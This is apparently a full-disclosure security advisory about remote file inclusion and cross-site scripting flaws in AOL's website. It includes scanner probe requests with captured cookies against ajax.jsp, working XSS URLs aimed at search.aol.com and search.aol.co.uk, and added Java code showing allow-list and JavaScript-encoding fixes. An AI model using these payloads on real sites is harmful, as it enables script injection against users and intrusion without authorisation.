AOL File Inclusion / Cross Site Scripting
Posted Jan 22, 2014
Authored by Juan Carlos Garcia

America Online (AOL) suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
MD5 | 0d9462b1f15af5ece7e02a57bd97dabc

AOL File Inclusion / Cross Site Scripting
*******************************


Vulnerability time-line
------------------------

-Multiple security advisories sent to the vendor

-No response

-No feedback

-Not fixed

-Another security advisory (and another...)

-No response, no feedback

-Full disclosure


I. VULNERABILITY
-------------------------

#Title: AOL File Inclusion / Cross Site Scripting

#Vendor: http://www.aol.com

#Author: Juan Carlos García (@secnight)
#Author: Francisco Moraga (@btshell)

www.asap-sec.com



II. DESCRIPTION
-------------------------

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol.", but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers, publishers, and advertisers.

Founded in 1983 as Control Video Corporation and rebuilt from that company's remnants as an online services company by Jim Kimsey, AOL has franchised its services to companies in several countries around the world or set up international versions of them. AOL is headquartered at 770 Broadway in New York.


(Wikipedia)

III. PROOF OF CONCEPT
-------------------------


Remote File Inclusion
*******************


Vulnerability description
---------------------------


The scanner reports that this script is vulnerable to file inclusion: it includes a file whose name is derived from user-supplied data, and that data is not validated before being passed to the include function.



Affected items
----------------

/ajax.jsp (5 findings; the affected GET parameters m and p are shown below)


The impact of this vulnerability
--------------------------------
According to the scanner, a remote attacker may be able to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the web server.

Note what the evidence below actually shows: the value of the m (or p) parameter is concatenated into a server-side resource path under /aol/main/modules/ and echoed back in a "requested resource ... is not available" error (Tomcat's standard wording), and everything after the "?" in the supplied value is dropped, which is consistent with the value being handed to a servlet RequestDispatcher, where a "?" starts a query string. That proves unvalidated input reaches a server-side include and that the error message reflects it. It does not by itself prove that the server will fetch and execute a file from an attacker-controlled host; confirming remote inclusion, or local inclusion via path traversal, requires pointing the parameter at a resource that actually exists and observing its content in the response.


How to fix this vulnerability
------------------------------
Edit the source code to ensure that input is properly validated. Where possible, define a list of accepted file names and restrict the input to that list.
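The following is an added example, not AOL's code and not part of the original advisory. It models what the two error messages in this report imply: the string "/aol/main/modules/" + m + "/" + p, truncated at the first "?", reproduces both observed paths exactly (the first finding taints m, variants 3 and 4 taint p). MODULE_ROOT, the allow-lists, and the method names are assumptions made for illustration; the hardened form implements the allow-list advice above.

```java
// Added example (not AOL's code). MODULE_ROOT and the allow-lists are assumptions.
import java.util.Set;
import java.util.regex.Pattern;

public final class ModuleResolver {
    static final String MODULE_ROOT = "/aol/main/modules/";   // assumed from the error text

    // Vulnerable form: both request parameters are concatenated into the include path.
    // The servlet API allows a query string on a RequestDispatcher path, so the
    // container splits at '?', which is why the error messages stop before "?%00.jpg".
    static String vulnerablePath(String m, String p) {
        String path = MODULE_ROOT + m + "/" + p;
        int q = path.indexOf('?');
        return q < 0 ? path : path.substring(0, q);
    }

    // Hardened form: each parameter must be a plain identifier on an explicit
    // allow-list; anything else is rejected with a generic error that does not
    // echo the input back to the client. The lists are hypothetical.
    static final Pattern SAFE_NAME = Pattern.compile("[a-z0-9_-]{1,32}");
    static final Set<String> ALLOWED_MODULES = Set.of("dynamiclead");
    static final Set<String> ALLOWED_PAGES = Set.of("dynamicleadslide");

    static String safePath(String m, String p) {
        if (!isAllowed(m, ALLOWED_MODULES) || !isAllowed(p, ALLOWED_PAGES)) {
            throw new IllegalArgumentException("unknown module");
        }
        return MODULE_ROOT + m + "/" + p;
    }

    static boolean isAllowed(String value, Set<String> allowed) {
        return value != null && SAFE_NAME.matcher(value).matches() && allowed.contains(value);
    }

    public static void main(String[] args) {
        // The advisory's probe after one round of URL decoding. The request used
        // %2500, so the decoded text holds a literal "%00", not a NUL byte.
        String probe = "http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg";

        // Reproduce the two observed error-message paths.
        System.out.println(vulnerablePath(probe, "dynamicleadslide"));   // first finding: m tainted
        System.out.println(vulnerablePath("dynamiclead", probe));        // variants 3 and 4: p tainted

        // The hardened resolver accepts the real values and rejects the probe.
        System.out.println(safePath("dynamiclead", "dynamicleadslide"));
        try {
            safePath("dynamiclead", probe);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allow-list check runs before the value is ever joined to a path, so neither a remote URL nor a traversal sequence can reach the include; the character-class check is a second layer in case the list is later loaded from configuration. Keeping the error message generic also removes the reflection that let the scanner see the concatenated path in the first place.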


Attack details
-----------------

URL-encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response

HTTP/1.1 200 OK
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
x-ua-compatible: IE=EmulateIE9
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 130
Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol
Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive




Variant 1
-----------

Identical to the attack details above: URL-encoded GET input m was set to the same URL, and the same error message, request and response were observed.


Variant 3
---------

URL-encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie:

tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D



Variant 4
---------

Attack details
----------------
URL-encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response
----------
HTTP/1.1 200 OK
Cache-Control: max-age=5
Connection: Keep-Alive
Via: AOL-CACHE
x-ua-compatible: IE=EmulateIE9
Pragma: no-cache
test-timestamp: 1390300006644
Content-Type: text/javascript;charset=UTF-8
Content-Length: 142
Keep-Alive: timeout=5, max=100



Cross Site Scripting
*********************

The shape of the payload shows that the s_chn parameter of the AOL search home page is reflected, without encoding, inside an inline <script> block: it starts with </script> to terminate that block (the HTML tokenizer ends a script element at the first "</script" it sees, whatever the JavaScript around it), injects its own script element, and ends with an opening <script> tag so that the remainder of the original script is swallowed instead of producing a visible parse error. Both the .com and .co.uk search sites are affected.

http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E


http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E …
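The following is an added example, not AOL's code and not part of the original advisory. It shows the encoding the search page would need before placing s_chn inside an inline script: because the HTML tokenizer does not understand JavaScript escapes, every character that HTML or JavaScript could interpret is emitted as a \uXXXX escape, so "</script>" can never appear in the page source. The page template, the variable name and the method name are assumptions.

```java
// Added example (not AOL's code). The template around the value is hypothetical.
public final class JsContextEncoder {

    // Encode a value for use inside a JavaScript string literal that is itself
    // embedded in an HTML <script> block. Only an unambiguous set of characters
    // passes through; everything else (including < > " ' / \ & and control
    // characters) becomes a \uXXXX escape, which the JS engine decodes inside
    // the string literal but the HTML parser never sees as markup.
    static String forJavaScript(String value) {
        StringBuilder sb = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            boolean safe = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                        || (c >= '0' && c <= '9') || c == ' ' || c == '.' || c == ',' || c == '_';
            if (safe) {
                sb.append(c);
            } else {
                sb.append(String.format("\\u%04X", (int) c));
            }
        }
        return sb.toString();
    }

    // Hypothetical template: the channel value ends up in an inline script.
    // Vulnerable form, for comparison: "<script>var channel = \"" + sChn + "\";</script>"
    static String render(String sChn) {
        return "<script>var channel = \"" + forJavaScript(sChn) + "\";</script>";
    }

    public static void main(String[] args) {
        // The advisory's first payload, URL-decoded.
        String payload = "</script><script>alert(\"Secnight and BTshell\");</script><script>";
        System.out.println(render(payload));
    }
}
```

In the rendered output every "<" becomes \u003C and every "/" becomes \u002F, so the script element is not terminated early and the browser assigns the attacker's text to the variable as inert data. In production the same job is done by the OWASP Java Encoder's Encode.forJavaScript; the hand-written version above exists only to make the mechanism visible.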


IV. AUTHORS
-----------
Juan Carlos García @secnight
Francisco Moraga @BTshell
ASAP Security (As Soon As Possible)

www.asap-sec.com

LEGAL NOTICES
--------------

The authors accept no responsibility for any damage caused by the use or misuse of this information.

packet storm

© 2016 Packet Storm. All rights reserved.
